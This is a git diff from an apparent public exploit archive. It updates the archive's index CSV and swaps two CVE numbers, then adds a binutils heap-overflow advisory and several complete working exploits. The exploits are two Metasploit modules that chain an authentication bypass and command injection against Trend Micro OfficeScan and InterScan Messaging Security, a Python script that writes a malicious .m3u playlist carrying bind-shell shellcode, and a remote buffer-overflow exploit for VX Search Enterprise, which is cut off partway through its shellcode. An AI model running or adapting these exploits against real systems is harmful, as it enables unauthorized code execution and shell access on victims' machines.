'FrameLoader::clear' Stealing Variables via Page Navigation",2017-05-25,"Google Security Research",multiple,webapps,0 42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0 42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0 @@ -38320,7 +38323,7 @@ id,file,description,date,author,platform,type,port 42101,platforms/linux/webapps/42101.py,"Riverbed SteelHead VCX 9.6.0a - Arbitrary File Read",2017-06-01,"Gregory Draperi",linux,webapps,0 42105,platforms/multiple/webapps/42105.html,"WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0 42106,platforms/multiple/webapps/42106.html,"WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0 -42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0 +42107,platforms/multiple/webapps/42107.html,"WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting",2017-06-01,"Google Security Research",multiple,webapps,0 42111,platforms/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",json,webapps,0 42113,platforms/php/webapps/42113.txt,"Joomla! Component Payage 2.05 - 'aid' Parameter SQL Injection",2017-06-03,"Persian Hack Team",php,webapps,0 42114,platforms/hardware/webapps/42114.py,"EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution",2017-06-04,LiquidWorm,hardware,webapps,0 @@ -38401,7 +38404,7 @@ id,file,description,date,author,platform,type,port 42359,platforms/php/webapps/42359.txt,"PaulShop - SQL Injection / Cross-Site Scripting",2017-07-24,"BTIS Team",php,webapps,0 42371,platforms/json/webapps/42371.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution",2017-07-24,"RedTeam Pentesting",json,webapps,0 42372,platforms/json/webapps/42372.txt,"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure",2017-07-24,"RedTeam Pentesting",json,webapps,0 -42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0 +42378,platforms/multiple/webapps/42378.html,"WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting",2017-07-25,"Google Security Research",multiple,webapps,0 42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0 42380,platforms/php/webapps/42380.txt,"Wordpress Plugin Ads Pro <= 3.4 - Cross-Site Scripting / SQL Injection",2017-07-25,8bitsec,php,webapps,0 42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0 @@ -38667,3 +38670,5 @@ id,file,description,date,author,platform,type,port 42966,platforms/jsp/webapps/42966.py,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution",2017-10-09,intx0x80,jsp,webapps,0 42967,platforms/php/webapps/42967.txt,"ClipShare 7.0 - SQL Injection",2017-10-09,8bitsec,php,webapps,0 42968,platforms/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,php,webapps,0 +42971,platforms/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0 +42972,platforms/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0 diff --git a/platforms/jsp/webapps/42939.txt b/platforms/jsp/webapps/42939.txt index a568b009b..d035db850 100755 --- a/platforms/jsp/webapps/42939.txt +++ b/platforms/jsp/webapps/42939.txt @@ -2,7 +2,7 @@ Title: OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) - SQL Injection Author: Marcin Woloszyn Date: 27. September 2017 -CVE: CVE-2017-14758 +CVE: CVE-2017-14757 Affected Software: ================== diff --git a/platforms/jsp/webapps/42940.txt b/platforms/jsp/webapps/42940.txt index c7e1bdeae..4c7e7ddb1 100755 --- a/platforms/jsp/webapps/42940.txt +++ b/platforms/jsp/webapps/42940.txt @@ -2,7 +2,7 @@ Title: OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) - SQL Injection Author: Marcin Woloszyn Date: 27. September 2017 -CVE: CVE-2017-14757 +CVE: CVE-2017-14758 Affected Software: ================== diff --git a/platforms/linux/dos/42970.txt b/platforms/linux/dos/42970.txt new file mode 100755 index 000000000..7ee71f716 --- /dev/null +++ b/platforms/linux/dos/42970.txt @@ -0,0 +1,112 @@ +Source: https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read_1_byte-dwarf2-c/ + +Description: +binutils is a set of tools necessary to build programs. + +The complete ASan output of the issue: + +# nm -A -a -l -S -s --special-syms --synthetic --with-symbol-versions -D $FILE +==3235==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x613000000512 at pc 0x7f7c93ae3c88 bp 0x7ffe38d7a970 sp 0x7ffe38d7a968 +READ of size 1 at 0x613000000512 thread T0 + #0 0x7f7c93ae3c87 in read_1_byte /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:616:10 + #1 0x7f7c93ae3c87 in decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:2311 + #2 0x7f7c93aee92b in comp_unit_maybe_decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3608:26 + #3 0x7f7c93aee92b in comp_unit_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3643 + #4 0x7f7c93aeb94f in _bfd_dwarf2_find_nearest_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:4755:11 + #5 0x7f7c93a2920b in _bfd_elf_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/elf.c:8694:10 + #6 0x517c83 in print_symbol /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1003:9 + #7 0x51542d in print_symbols /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1084:7 + #8 0x51542d in display_rel_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1200 + #9 0x510f56 in display_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1318:7 + #10 0x50faae in main /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1792:12 + #11 0x7f7c9296e680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289 + #12 0x41ac18 in _init (/usr/x86_64-pc-linux-gnu/binutils-bin/git/nm+0x41ac18) + +0x613000000512 is located 0 bytes to the right of 338-byte region [0x6130000003c0,0x613000000512) +allocated by thread T0 here: + #0 0x4d8e08 in malloc /var/tmp/portage/sys-libs/compiler-rt-sanitizers-5.0.0/work/compiler-rt-5.0.0.src/lib/asan/asan_malloc_linux.cc:67 + #1 0x7f7c9393a37c in bfd_malloc /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/libbfd.c:193:9 + #2 0x7f7c9392fb2f in bfd_get_full_section_contents /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/compress.c:248:21 + #3 0x7f7c939696d3 in bfd_simple_get_relocated_section_contents /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/simple.c:193:12 + #4 0x7f7c93ade26e in read_section /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:556:8 + #5 0x7f7c93adef3c in decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:2047:9 + #6 0x7f7c93aee92b in comp_unit_maybe_decode_line_info /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3608:26 + #7 0x7f7c93aee92b in comp_unit_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:3643 + #8 0x7f7c93aeb94f in _bfd_dwarf2_find_nearest_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:4755:11 + #9 0x7f7c93a2920b in _bfd_elf_find_line /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/elf.c:8694:10 + #10 0x517c83 in print_symbol /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1003:9 + #11 0x51542d in print_symbols /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1084:7 + #12 0x51542d in display_rel_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1200 + #13 0x510f56 in display_file /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1318:7 + #14 0x50faae in main /var/tmp/portage/sys-devel/binutils-9999/work/binutils/binutils/nm.c:1792:12 + #15 0x7f7c9296e680 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.23-r4/work/glibc-2.23/csu/../csu/libc-start.c:289 + +SUMMARY: AddressSanitizer: heap-buffer-overflow /var/tmp/portage/sys-devel/binutils-9999/work/binutils/bfd/dwarf2.c:616:10 in read_1_byte +Shadow bytes around the buggy address: + 0x0c267fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c267fff8060: 00 00 00 00 00 00 00 00 00 00 00 04 fa fa fa fa + 0x0c267fff8070: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 + 0x0c267fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x0c267fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c267fff80a0: 00 00[02]fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c267fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c267fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c267fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c267fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c267fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==3235==ABORTING +Affected version: +2.29.51.20170921 and maybe past releases + +Fixed version: +N/A + +Commit fix: +https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=515f23e63c0074ab531bc954f84ca40c6281a724 + +Credit: +This bug was discovered by Agostino Sarubbo of Gentoo. + +CVE: +CVE-2017-14939 + +Reproducer: +https://github.com/asarubbo/poc/blob/master/00370-binutils-heapoverflow-read_1_byte +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42970.zip + +Timeline: +2017-09-21: bug discovered and reported to upstream +2017-09-24: upstream released a patch +2017-09-26: blog post about the issue +2017-09-29: CVE assigned + +Note: +This bug was found with American Fuzzy Lop. +This bug was identified with bare metal servers donated by Packet. This work is also supported by the Core Infrastructure Initiative. + +Permalink: + +https://blogs.gentoo.org/ago/2017/09/26/binutils-heap-based-buffer-overflow-in-read_1_byte-dwarf2-c/ + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42970.zip diff --git a/platforms/php/webapps/42971.rb b/platforms/php/webapps/42971.rb new file mode 100755 index 000000000..71459a1f7 --- /dev/null +++ b/platforms/php/webapps/42971.rb @@ -0,0 +1,216 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Powershell + + def initialize(info={}) + super(update_info(info, + 'Name' => "Trend Micro OfficeScan Remote Code Execution", + 'Description' => %q{ + This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a + terminal command under the context of the web server user. + + The specific flaw exists within the management interface, which listens on TCP port 443 by default. The Trend Micro Officescan product + has a widget feature which is implemented with PHP. Talker.php takes ack and hash parameters but doesn't validate these values, which + leads to an authentication bypass for the widget. Proxy.php files under the mod TMCSS folder take multiple parameters but the process + does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, + unauthenticated users can execute a terminal command under the context of the web server user. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'mr_me ', # author of command injection + 'Mehmet Ince ' # author of authentication bypass & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'], + ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'], + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 443 + }, + 'Platform' => ['win'], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true }], + ['OfficeScan 11', {}], + ['OfficeScan XG', {}], + ], + 'Privileged' => false, + 'DisclosureDate' => "Oct 7 2017", + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the Trend Micro OfficeScan management interface', '/']) + ] + ) + end + + def build_csrftoken(my_target, phpsessid=nil) + vprint_status("Building csrftoken") + if my_target.name == 'OfficeScan XG' + csrf_token = Rex::Text.md5(Time.now.to_s) + else + csrf_token = phpsessid.scan(/PHPSESSID=([a-zA-Z0-9]+)/).flatten[0] + end + csrf_token + end + + def auto_target + #XG version of the widget library has package.json within the same directory. + mytarget = target + if target['auto'] && target.name =~ /Automatic/ + print_status('Automatic targeting enabled. Trying to detect version.') + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'package.json'), + }) + + if res && res.code == 200 + mytarget = targets[2] + elsif res && res.code == 404 + mytarget = targets[1] + else + fail_with(Failure::Unknown, 'Unable to automatically select a target') + end + print_status("Selected target system : #{mytarget.name}") + end + mytarget + end + + def auth(my_target) + # Version XG performs MD5 validation on wf_CSRF_token parameter. We can't simply use PHPSESSID directly because it contains a-zA-Z0-9. + # Beside that, version 11 use PHPSESSID value as a csrf token. Thus, we are manually crafting the cookie. + if my_target.name == 'OfficeScan XG' + csrf_token = build_csrftoken(my_target) + cookie = "LANG=en_US; LogonUser=root; userID=1; wf_CSRF_token=#{csrf_token}" + # Version 11 want to see valid PHPSESSID from beginning to the end. For this reason we need to force backend to initiate one for us. + else + vprint_status("Sending session initiation request for : #{my_target.name}.") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'index.php'), + }) + cookie = "LANG=en_US; LogonUser=root; userID=1; #{res.get_cookies}" + csrf_token = build_csrftoken(my_target, res.get_cookies) + end + + # Okay, we dynamically generated a cookie and csrf_token values depends on OfficeScan version. + # Now we need to exploit authentication bypass vulnerability. + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'ui', 'modLogin', 'talker.php'), + 'headers' => { + 'X-CSRFToken' => csrf_token, + 'ctype' => 'application/x-www-form-urlencoded; charset=utf-8' + }, + 'cookie' => cookie, + 'vars_post' => { + 'cid' => '1', + 'act' => 'check', + 'hash' => Rex::Text.rand_text_alpha(10), + 'pid' => '1' + } + }) + + if res && res.code == 200 && res.body.include?('login successfully') + # Another business logic in here. + # Version 11 want to use same PHPSESSID generated at the beginning by hitting index.php + # Version XG want to use newly created PHPSESSID that comes from auth bypass response. + if my_target.name == 'OfficeScan XG' + res.get_cookies + else + cookie + end + else + nil + end + end + + def check + my_target = auto_target + token = auth(my_target) + # If we dont have a cookie that means authentication bypass issue has been patched on target system. + if token.nil? + Exploit::CheckCode::Safe + else + # Authentication bypass does not mean that we have a command injection. + # Accessing to the widget framework without having command injection means literally nothing. + # So we gonna trigger command injection vulnerability without a payload. + csrf_token = build_csrftoken(my_target, token) + vprint_status('Trying to detect command injection vulnerability') + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'), + 'headers' => { + 'X-CSRFToken' => csrf_token, + 'ctype' => 'application/x-www-form-urlencoded; charset=utf-8' + }, + 'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{token}", + 'vars_post' => { + 'module' => 'modTMCSS', + 'serverid' => '1', + 'TOP' => '' + } + }) + if res && res.code == 200 && res.body.include?('Proxy execution failed: exec report.php failed') + Exploit::CheckCode::Vulnerable + else + Exploit::CheckCode::Safe + end + end + end + + def exploit + mytarget = auto_target + print_status('Exploiting authentication bypass') + cookie = auth(mytarget) + if cookie.nil? + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + else + print_good("Authenticated successfully bypassed.") + end + + print_status('Generating payload') + + powershell_options = { + encode_final_payload: true, + remove_comspec: true + } + p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options) + + + # We need to craft csrf value for version 11 again like we did before at auth function. + csrf_token = build_csrftoken(mytarget, cookie) + + print_status('Trigerring command injection vulnerability') + + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'officescan', 'console', 'html', 'widget', 'proxy_controller.php'), + 'headers' => { + 'X-CSRFToken' => csrf_token, + 'ctype' => 'application/x-www-form-urlencoded; charset=utf-8' + }, + 'cookie' => "LANG=en_US; LogonUser=root; wf_CSRF_token=#{csrf_token}; #{cookie}", + 'vars_post' => { + 'module' => 'modTMCSS', + 'serverid' => '1', + 'TOP' => "2>&1||#{p}" + } + }) + + end +end diff --git a/platforms/php/webapps/42972.rb b/platforms/php/webapps/42972.rb new file mode 100755 index 000000000..a2fe44a40 --- /dev/null +++ b/platforms/php/webapps/42972.rb @@ -0,0 +1,130 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution", + 'Description' => %q{ + This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a + terminal command under the context of the web server user. + + The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product + have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which + leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process + does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, + unauthenticated users can execute a terminal command under the context of the web server user. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'mr_me ', # author of command injection + 'Mehmet Ince ' # author of authentication bypass & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'], + ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'], + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 8445 + }, + 'Payload' => + { + 'Compat' => + { + 'ConnectionType' => '-bind' + }, + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', {}]], + 'Privileged' => false, + 'DisclosureDate' => "Oct 7 2017", + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the Trend Micro IMSVA management interface', '/']) + ] + ) + end + + def extract_jsessionid + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log') + }) + if res && res.code == 200 && res.body.include?('JSEEEIONID') + res.body.scan(/JSEEEIONID:([A-F0-9]{32})/).flatten.last + else + nil + end + end + + def widget_auth(jsessionid) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'widget', 'index.php'), + 'cookie' => "CurrentLocale=en-U=en_US; JSESSIONID=#{jsessionid}" + }) + if res && res.code == 200 && res.body.include?('USER_GENERATED_WIDGET_DIR') + res.get_cookies + else + nil + end + end + + def check + # If we've managed to bypass authentication, that means target is most likely vulnerable. + jsessionid = extract_jsessionid + if jsessionid.nil? + return Exploit::CheckCode::Safe + end + auth = widget_auth(jsessionid) + if auth.nil? + Exploit::CheckCode::Safe + else + Exploit::CheckCode::Appears + end + end + + def exploit + print_status('Extracting JSESSIONID from publicly accessible log file') + jsessionid = extract_jsessionid + if jsessionid.nil? + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + else + print_good("Awesome. JSESSIONID value = #{jsessionid}") + end + + print_status('Initiating session with widget framework') + cookies = widget_auth(jsessionid) + if cookies.nil? + fail_with(Failure::NoAccess, "Latest JSESSIONID is expired. Wait for sysadmin to login IMSVA") + else + print_good('Session with widget framework successfully initiated.') + end + + print_status('Trigerring command injection vulnerability') + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'widget', 'proxy_controller.php'), + 'cookie' => "CurrentLocale=en-US; LogonUser=root; JSESSIONID=#{jsessionid}; #{cookies}", + 'vars_post' => { + 'module' => 'modTMCSS', + 'serverid' => '1', + 'TOP' => "$(python -c \"#{payload.encoded}\")" + } + }) + end +end diff --git a/platforms/windows/local/42974.py b/platforms/windows/local/42974.py new file mode 100755 index 000000000..c9f31eb64 --- /dev/null +++ b/platforms/windows/local/42974.py @@ -0,0 +1,85 @@ +# Exploit Title: Buffer Overflow via crafted malicious .m3u file + + +# Exploit Author: Parichay Rai + +# Tested on: XP Service Pack 3 + +# CVE : CVE-2017-15221 + +Description +------------ + +A buffer overflow Attack possible due to improper input mechanism + +Proof of Concept +---------------- + +#!/usr/bin/python + +#This exploit generates a malicious playlist for the asx to mp3 converter 3.1.3.7.2010. +#This is an exploit that work well against a windows XP3 systems! +#Successful exploit gives you a bind shell on 4444 + +BadChar= "\x00\x0a\x0d\x20" + +# Payload Generation Command: msfpayload windows/shell_bind_tcp EXITFUNC=none R | msfencode -a x86 -b "\x00\x0a\x0d\x20" -f c + +# Successful exploitation opens port 4444 on the victim Machine + +shellcode=("\xd9\xee\xbf\xad\x07\x92\x3e\xd9\x74\x24\xf4\x5e\x2b\xc9" + +"\xb1\x56\x31\x7e\x18\x03\x7e\x18\x83\xc6\xa9\xe5\x67\xc2" + +"\x59\x60\x87\x3b\x99\x13\x01\xde\xa8\x01\x75\xaa\x98\x95" + +"\xfd\xfe\x10\x5d\x53\xeb\xa3\x13\x7c\x1c\x04\x99\x5a\x13" + +"\x95\x2f\x63\xff\x55\x31\x1f\x02\x89\x91\x1e\xcd\xdc\xd0" + +"\x67\x30\x2e\x80\x30\x3e\x9c\x35\x34\x02\x1c\x37\x9a\x08" + +"\x1c\x4f\x9f\xcf\xe8\xe5\x9e\x1f\x40\x71\xe8\x87\xeb\xdd" + +"\xc9\xb6\x38\x3e\x35\xf0\x35\xf5\xcd\x03\x9f\xc7\x2e\x32" + +"\xdf\x84\x10\xfa\xd2\xd5\x55\x3d\x0c\xa0\xad\x3d\xb1\xb3" + +"\x75\x3f\x6d\x31\x68\xe7\xe6\xe1\x48\x19\x2b\x77\x1a\x15" + +"\x80\xf3\x44\x3a\x17\xd7\xfe\x46\x9c\xd6\xd0\xce\xe6\xfc" + +"\xf4\x8b\xbd\x9d\xad\x71\x10\xa1\xae\xde\xcd\x07\xa4\xcd" + +"\x1a\x31\xe7\x99\xef\x0c\x18\x5a\x67\x06\x6b\x68\x28\xbc" + +"\xe3\xc0\xa1\x1a\xf3\x27\x98\xdb\x6b\xd6\x22\x1c\xa5\x1d" + +"\x76\x4c\xdd\xb4\xf6\x07\x1d\x38\x23\x87\x4d\x96\x9b\x68" + +"\x3e\x56\x4b\x01\x54\x59\xb4\x31\x57\xb3\xc3\x75\x99\xe7" + +"\x80\x11\xd8\x17\x37\xbe\x55\xf1\x5d\x2e\x30\xa9\xc9\x8c" + +"\x67\x62\x6e\xee\x4d\xde\x27\x78\xd9\x08\xff\x87\xda\x1e" + +"\xac\x24\x72\xc9\x26\x27\x47\xe8\x39\x62\xef\x63\x02\xe5" + +"\x65\x1a\xc1\x97\x7a\x37\xb1\x34\xe8\xdc\x41\x32\x11\x4b" + +"\x16\x13\xe7\x82\xf2\x89\x5e\x3d\xe0\x53\x06\x06\xa0\x8f" + +"\xfb\x89\x29\x5d\x47\xae\x39\x9b\x48\xea\x6d\x73\x1f\xa4" + +"\xdb\x35\xc9\x06\xb5\xef\xa6\xc0\x51\x69\x85\xd2\x27\x76" + +"\xc0\xa4\xc7\xc7\xbd\xf0\xf8\xe8\x29\xf5\x81\x14\xca\xfa" + +"\x58\x9d\xa0\xc0\x80\xbf\xdc\x6c\xd1\xfd\x80\x8e\x0c\xc1" + +"\xbc\x0c\xa4\xba\x3a\x0c\xcd\xbf\x07\x8a\x3e\xb2\x18\x7f" + +"\x40\x61\x18\xaa") + +buffer="http://" +buffer+="A"*17417 +buffer+="\x53\x93\x42\x7e" #(overwrites EIP in windows XP service pack 3 with the address of user32.dll) +buffer+="\x90"*10 #NOPs +buffer+=shellcode +buffer+="\x90"*10 #NOPs +f=open("exploit.m3u","w") +f.write(buffer); +f.close() + +---------------------- +Affected Targets +--------------------- + +ASX to MP3 version 3.1.3.7 and May be less + + +Solution +--------------- + +Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing "junk" characters, etc. + + +Credits +---------- + +Offensive Security +Rebellious Ceaser \ No newline at end of file diff --git a/platforms/windows/remote/42973.py b/platforms/windows/remote/42973.py new file mode 100755 index 000000000..0a4af0a94 --- /dev/null +++ b/platforms/windows/remote/42973.py @@ -0,0 +1,103 @@ +#!/usr/bin/env python +# Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow +# Exploit Author : Revnic Vasile +# Email : revnic[at]gmail[dot]com +# Date : 09-10-2017 +# Vendor Homepage : http://www.flexense.com/ +# Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.1.12.exe +# Version : 10.1.12 +# Tested on : Windows 7 x86 Pro SP1 +# Category : Windows Remote Exploit +# CVE : CVE-2017-15220 + + +import socket +import os +import sys +import struct + + +# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUN=none -e x86/alpha_mixed -f c +shellcode = ("\x89\xe5\xdb\xd3\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x39\x6c\x68\x68\x6f\x72\x55\x50\x77\x70\x53\x30\x43\x50\x4d" +"\x59\x79\x75\x66\x51\x69\x50\x45\x34\x6c\x4b\x32\x70\x70\x30" +"\x4c\x4b\x32\x72\x64\x4c\x6e\x6b\x56\x32\x66\x74\x6e\x6b\x72" +"\x52\x75\x78\x36\x6f\x4e\x57\x33\x7a\x57\x56\x54\x71\x4b\x4f" +"\x4e\x4c\x65\x6c\x65\x31\x73\x4c\x44\x42\x56\x4c\x75\x70\x5a" +"\x61\x38\x4f\x36\x6d\x63\x31\x4f\x37\x5a\x42\x58\x72\x63\x62" +"\x70\x57\x6e\x6b\x42\x72\x44\x50\x4c\x4b\x73\x7a\x45\x6c\x6e" +"\x6b\x72\x6c\x44\x51\x72\x58\x78\x63\x33\x78\x35\x51\x48\x51" +"\x42\x71\x6c\x4b\x43\x69\x37\x50\x77\x71\x5a\x73\x4c\x4b\x67" +"\x39\x77\x68\x5a\x43\x66\x5a\x53\x79\x4e\x6b\x74\x74\x4c\x4b" +"\x43\x31\x39\x46\x70\x31\x6b\x4f\x6e\x4c\x39\x51\x78\x4f\x46" +"\x6d\x53\x31\x38\x47\x55\x68\x39\x70\x72\x55\x7a\x56\x33\x33" +"\x33\x4d\x4b\x48\x35\x6b\x61\x6d\x74\x64\x50\x75\x4a\x44\x31" +"\x48\x4c\x4b\x46\x38\x56\x44\x73\x31\x69\x43\x50\x66\x4c\x4b" +"\x46\x6c\x72\x6b\x4c\x4b\x73\x68\x67\x6c\x43\x31\x4b\x63\x4c" +"\x4b\x46\x64\x4e\x6b\x76\x61\x48\x50\x4c\x49\x71\x54\x34\x64" +"\x35\x74\x63\x6b\x71\x4b\x71\x71\x36\x39\x31\x4a\x46\x31\x39" +"\x6f\x6d\x30\x43\x6f\x73\x6f\x32\x7a\x6e\x6b\x74\x52\x68\x6b" +"\x6c\x4d\x43\x6d\x62\x48\x44\x73\x44\x72\x77\x70\x65\x50\x33" 